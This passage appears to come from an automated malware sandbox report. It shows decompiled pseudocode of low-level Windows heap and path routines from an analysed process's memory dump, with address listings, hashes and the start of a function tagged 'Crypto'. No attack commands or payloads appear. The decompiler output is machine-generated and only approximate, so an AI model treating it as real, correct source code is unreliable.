												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E011B6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E011BF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E011BF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E011BF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E011BFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E011BFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E011BF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E011BF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01244CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E011CD130(_t427, _t494, _t511);
				}
			}










































































                                                                          0x01245ba5
                                                                          0x01245baa
                                                                          0x01245baf
                                                                          0x01245bb4
                                                                          0x01245bb6
                                                                          0x01245bbc
                                                                          0x01245bbe
                                                                          0x01245bc4
                                                                          0x01245bcd
                                                                          0x01245bd3
                                                                          0x01245bd6
                                                                          0x01245bdc
                                                                          0x01245be0
                                                                          0x01245be3
                                                                          0x01245beb
                                                                          0x01245bf2
                                                                          0x01245bf8
                                                                          0x01245bfe
                                                                          0x01245c04
                                                                          0x01245c0e
                                                                          0x01245c18
                                                                          0x01245c1f
                                                                          0x01245c25
                                                                          0x01245c2a
                                                                          0x01245c2c
                                                                          0x01245c32
                                                                          0x01245c3a
                                                                          0x01245c3f
                                                                          0x01245c42
                                                                          0x01245c48
                                                                          0x01245c5b
                                                                          0x01245c5b
                                                                          0x01245c2c
                                                                          0x01245cb7
                                                                          0x01245cb9
                                                                          0x01245cbf
                                                                          0x01245cc2
                                                                          0x01245cca
                                                                          0x01245ccb
                                                                          0x01245ccb
                                                                          0x01245cd1
                                                                          0x01245cd7
                                                                          0x01245cda
                                                                          0x01245ce1
                                                                          0x01245ce4
                                                                          0x01245ce7
                                                                          0x01245ced
                                                                          0x01245cf3
                                                                          0x01245cf9
                                                                          0x01245cff
                                                                          0x01245d08
                                                                          0x01245d0a
                                                                          0x01245d0e
                                                                          0x01245d10
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d16
                                                                          0x01245d1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d20
                                                                          0x01245d22
                                                                          0x01245d25
                                                                          0x01245d2f
                                                                          0x01245d2f
                                                                          0x01245d33
                                                                          0x01245d3d
                                                                          0x01245d49
                                                                          0x01245d4b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d5a
                                                                          0x01245d5d
                                                                          0x01245d60
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d66
                                                                          0x01245d69
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d6f
                                                                          0x01245d6f
                                                                          0x01245d73
                                                                          0x01245d79
                                                                          0x01245d7f
                                                                          0x01245d86
                                                                          0x01245d95
                                                                          0x01245d98
                                                                          0x01245dba
                                                                          0x01245dcb
                                                                          0x01245dce
                                                                          0x01245dd3
                                                                          0x01245dd6
                                                                          0x01245dd8
                                                                          0x01245de6
                                                                          0x01245dec
                                                                          0x01245dee
                                                                          0x01245df1
                                                                          0x01245df3
                                                                          0x0124635a
                                                                          0x0124635a
                                                                          0x00000000
                                                                          0x0124635a
                                                                          0x01245dfe
                                                                          0x01245e02
                                                                          0x01245e05
                                                                          0x01245e07
                                                                          0x01245e10
                                                                          0x01245e13
                                                                          0x01245e1b
                                                                          0x01245e1c
                                                                          0x01245e21
                                                                          0x01245e22
                                                                          0x01245e23
                                                                          0x01245e25
                                                                          0x01245e2a
                                                                          0x01245e2c
                                                                          0x01245e2e
                                                                          0x01245e36
                                                                          0x01245e39
                                                                          0x01245e42
                                                                          0x01245e47
                                                                          0x01245e4d
                                                                          0x01245e54
                                                                          0x01245e54
                                                                          0x01245e54
                                                                          0x01245e2e
                                                                          0x01245e5c
                                                                          0x01245e5f
                                                                          0x01245e62
                                                                          0x01245e64
                                                                          0x01245e6b
                                                                          0x01245e70
                                                                          0x01245e7a
                                                                          0x01245e7a
                                                                          0x01245e7a
                                                                          0x01245e6b
                                                                          0x01245e7e
                                                                          0x01245e7f
                                                                          0x01245e7f
                                                                          0x01245e81
                                                                          0x01245e87
                                                                          0x01245e8b
                                                                          0x01245e8c
                                                                          0x01245e8c
                                                                          0x01245e8c
                                                                          0x01245e9a
                                                                          0x01245e9c
                                                                          0x01245ea2
                                                                          0x01245ea6
                                                                          0x01245f50
                                                                          0x01245f50
                                                                          0x01245f57
                                                                          0x01245f66
                                                                          0x01245f66
                                                                          0x01245f66
                                                                          0x01245f68
                                                                          0x01245f6a
                                                                          0x012463d0
                                                                          0x00000000
                                                                          0x01245f70
                                                                          0x01245f70
                                                                          0x01245f91
                                                                          0x01245f9c
                                                                          0x01245f9e
                                                                          0x01245fa4
                                                                          0x01245fa6
                                                                          0x0124638c
                                                                          0x01246392
                                                                          0x012463a1
                                                                          0x012463a7
                                                                          0x012463af
                                                                          0x012463af
                                                                          0x012463bd
                                                                          0x012463d8
                                                                          0x00000000
                                                                          0x012463d8
                                                                          0x01245fac
                                                                          0x01245fb2
                                                                          0x01245fb4
                                                                          0x01245fbd
                                                                          0x01245fc6
                                                                          0x01245fce
                                                                          0x01245fd4
                                                                          0x01245fdc
                                                                          0x01245fec
                                                                          0x01245fed
                                                                          0x01245fee
                                                                          0x01245fef
                                                                          0x01245ff9
                                                                          0x01245ffa
                                                                          0x01245ffb
                                                                          0x01245ffc
                                                                          0x01246000
                                                                          0x01246004
                                                                          0x01246012
                                                                          0x01246012
                                                                          0x01246018
                                                                          0x01246019
                                                                          0x0124601a
                                                                          0x0124601b
                                                                          0x0124601c
                                                                          0x01246020
                                                                          0x01246059
                                                                          0x0124605c
                                                                          0x01246061
                                                                          0x01246061
                                                                          0x01246022
                                                                          0x01246022
                                                                          0x01246022
                                                                          0x01246025
                                                                          0x0124602a
                                                                          0x0124602b
                                                                          0x01246031
                                                                          0x01246037
                                                                          0x01246038
                                                                          0x0124603e
                                                                          0x01246048
                                                                          0x01246049
                                                                          0x0124604a
                                                                          0x0124604b
                                                                          0x0124604c
                                                                          0x0124604d
                                                                          0x01246053
                                                                          0x01246054
                                                                          0x01246054
                                                                          0x01246062
                                                                          0x01246065
                                                                          0x01246067
                                                                          0x0124606a
                                                                          0x01246070
                                                                          0x01246075
                                                                          0x01246076
                                                                          0x01246081
                                                                          0x01246087
                                                                          0x01246095
                                                                          0x01246099
                                                                          0x0124609e
                                                                          0x012460a4
                                                                          0x012460ae
                                                                          0x012460b0
                                                                          0x012460b3
                                                                          0x012460b6
                                                                          0x012460b8
                                                                          0x012460ba
                                                                          0x012460ba
                                                                          0x012460ba
                                                                          0x012460ba
                                                                          0x012460be
                                                                          0x012460c0
                                                                          0x012460c5
                                                                          0x012460c5
                                                                          0x012460c5
                                                                          0x012460c6
                                                                          0x012460cd
                                                                          0x01246114
                                                                          0x012460cf
                                                                          0x012460cf
                                                                          0x012460d4
                                                                          0x012460d5
                                                                          0x012460da
                                                                          0x012460db
                                                                          0x012460e1
                                                                          0x012460e2
                                                                          0x012460e8
                                                                          0x012460f8
                                                                          0x012460fd
                                                                          0x012460fe
                                                                          0x01246102
                                                                          0x01246104
                                                                          0x01246107
                                                                          0x01246109
                                                                          0x0124610b
                                                                          0x0124610b
                                                                          0x0124610b
                                                                          0x0124610b
                                                                          0x0124610f
                                                                          0x0124610f
                                                                          0x01246117
                                                                          0x0124611a
                                                                          0x0124611f
                                                                          0x01246125
                                                                          0x01246134
                                                                          0x01246139
                                                                          0x0124613f
                                                                          0x01246146
                                                                          0x01246148
                                                                          0x0124614b
                                                                          0x0124614d
                                                                          0x0124614f
                                                                          0x0124614f
                                                                          0x0124614f
                                                                          0x0124614f
                                                                          0x01246153
                                                                          0x01246159
                                                                          0x01246159
                                                                          0x0124615c
                                                                          0x01246163
                                                                          0x01246169
                                                                          0x0124616c
                                                                          0x01246172
                                                                          0x01246181
                                                                          0x01246186
                                                                          0x01246187
                                                                          0x0124618b
                                                                          0x01246191
                                                                          0x01246195
                                                                          0x012461a3
                                                                          0x012461bb
                                                                          0x012461c0
                                                                          0x012461c3
                                                                          0x012461cc
                                                                          0x012461d0
                                                                          0x012461dc
                                                                          0x012461de
                                                                          0x012461e1
                                                                          0x012461e4
                                                                          0x012461e6
                                                                          0x012461e8
                                                                          0x012461e8
                                                                          0x012461e8
                                                                          0x012461e8
                                                                          0x012461e6
                                                                          0x012461ec
                                                                          0x012461f3
                                                                          0x01246203
                                                                          0x01246209
                                                                          0x0124620a
                                                                          0x01246216
                                                                          0x0124621d
                                                                          0x01246227
                                                                          0x01246241
                                                                          0x01246246
                                                                          0x0124624c
                                                                          0x01246257
                                                                          0x01246259
                                                                          0x0124625c
                                                                          0x0124625e
                                                                          0x01246260
                                                                          0x01246260
                                                                          0x01246260
                                                                          0x01246260
                                                                          0x0124625e
                                                                          0x01246264
                                                                          0x01246267
                                                                          0x01246269
                                                                          0x01246315
                                                                          0x01246315
                                                                          0x0124631b
                                                                          0x0124631e
                                                                          0x01246324
                                                                          0x01246327
                                                                          0x0124632f
                                                                          0x01246330
                                                                          0x01246333
                                                                          0x0124633a
                                                                          0x0124633c
                                                                          0x01246335
                                                                          0x01246335
                                                                          0x01246335
                                                                          0x0124633f
                                                                          0x01246342
                                                                          0x0124634c
                                                                          0x01246352
                                                                          0x01246355
                                                                          0x01246355
                                                                          0x01246359
                                                                          0x00000000
                                                                          0x0124626f
                                                                          0x01246275
                                                                          0x01246275
                                                                          0x01246278
                                                                          0x0124627e
                                                                          0x0124627e
                                                                          0x01246281
                                                                          0x01246287
                                                                          0x0124628d
                                                                          0x01246298
                                                                          0x0124629c
                                                                          0x012462a2
                                                                          0x0124629e
                                                                          0x0124629e
                                                                          0x0124629e
                                                                          0x012462a7
                                                                          0x012462a7
                                                                          0x012462aa
                                                                          0x012462b0
                                                                          0x012462f0
                                                                          0x012462f0
                                                                          0x012462f2
                                                                          0x012462f8
                                                                          0x012462fd
                                                                          0x012462b2
                                                                          0x012462b2
                                                                          0x012462b2
                                                                          0x012462b5
                                                                          0x012462dd
                                                                          0x012462e2
                                                                          0x012462e5
                                                                          0x012462b7
                                                                          0x012462b8
                                                                          0x012462bb
                                                                          0x012462bd
                                                                          0x012462c0
                                                                          0x012462c4
                                                                          0x012462cd
                                                                          0x012462cd
                                                                          0x012462c0
                                                                          0x012462bb
                                                                          0x012462b5
                                                                          0x01246302
                                                                          0x01246303
                                                                          0x01246305
                                                                          0x01246305
                                                                          0x01246305
                                                                          0x0124630c
                                                                          0x0124630c
                                                                          0x00000000
                                                                          0x0124627e
                                                                          0x01246269
                                                                          0x01245eac
                                                                          0x01245ebb
                                                                          0x01245ebe
                                                                          0x01245ecb
                                                                          0x01245ecb
                                                                          0x01245ece
                                                                          0x01245ece
                                                                          0x01245ed4
                                                                          0x01245ed7
                                                                          0x01245ed9
                                                                          0x01245edb
                                                                          0x01245edb
                                                                          0x01245ee1
                                                                          0x01245ee1
                                                                          0x01245ee3
                                                                          0x01245f20
                                                                          0x01245f20
                                                                          0x01245ee5
                                                                          0x01245ee5
                                                                          0x01245ee5
                                                                          0x01245ee8
                                                                          0x01245f11
                                                                          0x01245f18
                                                                          0x01245eea
                                                                          0x01245eea
                                                                          0x01245eed
                                                                          0x01245ef2
                                                                          0x01245ef8
                                                                          0x01245efb
                                                                          0x01245f0a
                                                                          0x01245f0a
                                                                          0x01245eed
                                                                          0x01245ee8
                                                                          0x01245f22
                                                                          0x01245f28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245f30
                                                                          0x01245f31
                                                                          0x01245f37
                                                                          0x01245f3a
                                                                          0x01245f3d
                                                                          0x01245f44
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245f46
                                                                          0x01245f48
                                                                          0x01245f4d
                                                                          0x00000000
                                                                          0x01245f4d
                                                                          0x01245dda
                                                                          0x01245ddf
                                                                          0x00000000
                                                                          0x01245ddf
                                                                          0x01245dd8
                                                                          0x01245da7
                                                                          0x01245da9
                                                                          0x01245dac
                                                                          0x01245dae
                                                                          0x00000000
                                                                          0x01245db4
                                                                          0x01245db4
                                                                          0x00000000
                                                                          0x01245db4
                                                                          0x01245dae
                                                                          0x01245d88
                                                                          0x01245d8d
                                                                          0x01246363
                                                                          0x01246369
                                                                          0x0124636a
                                                                          0x01246370
                                                                          0x01246372
                                                                          0x0124637a
                                                                          0x0124637b
                                                                          0x0124637d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0124637f
                                                                          0x01246385
                                                                          0x00000000
                                                                          0x01246385
                                                                          0x01245d38
                                                                          0x01245d3b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01245d3b
                                                                          0x01245d27
                                                                          0x01245d29
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01246360
                                                                          0x00000000
                                                                          0x01246360
                                                                          0x01245c10
                                                                          0x01245c10
                                                                          0x012463da
                                                                          0x012463e5
                                                                          0x012463e5

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d57772a720a33dc22d2db1654ab611a0a8591f0cacd4a9501c06557944fc8ddc
                                                                          • Instruction ID: 30a1f85b36bc7f71d5fe8eed0fd1c39e77284ed11c03c543fa16862ed98bb638
                                                                          • Opcode Fuzzy Hash: d57772a720a33dc22d2db1654ab611a0a8591f0cacd4a9501c06557944fc8ddc
                                                                          • Instruction Fuzzy Hash: 96426C71D2026ACFDB28CF68C881BA9BBB1FF45704F1481AAD94DEB242D7749985CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01194120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E01194120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x126d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E011AF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01196E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
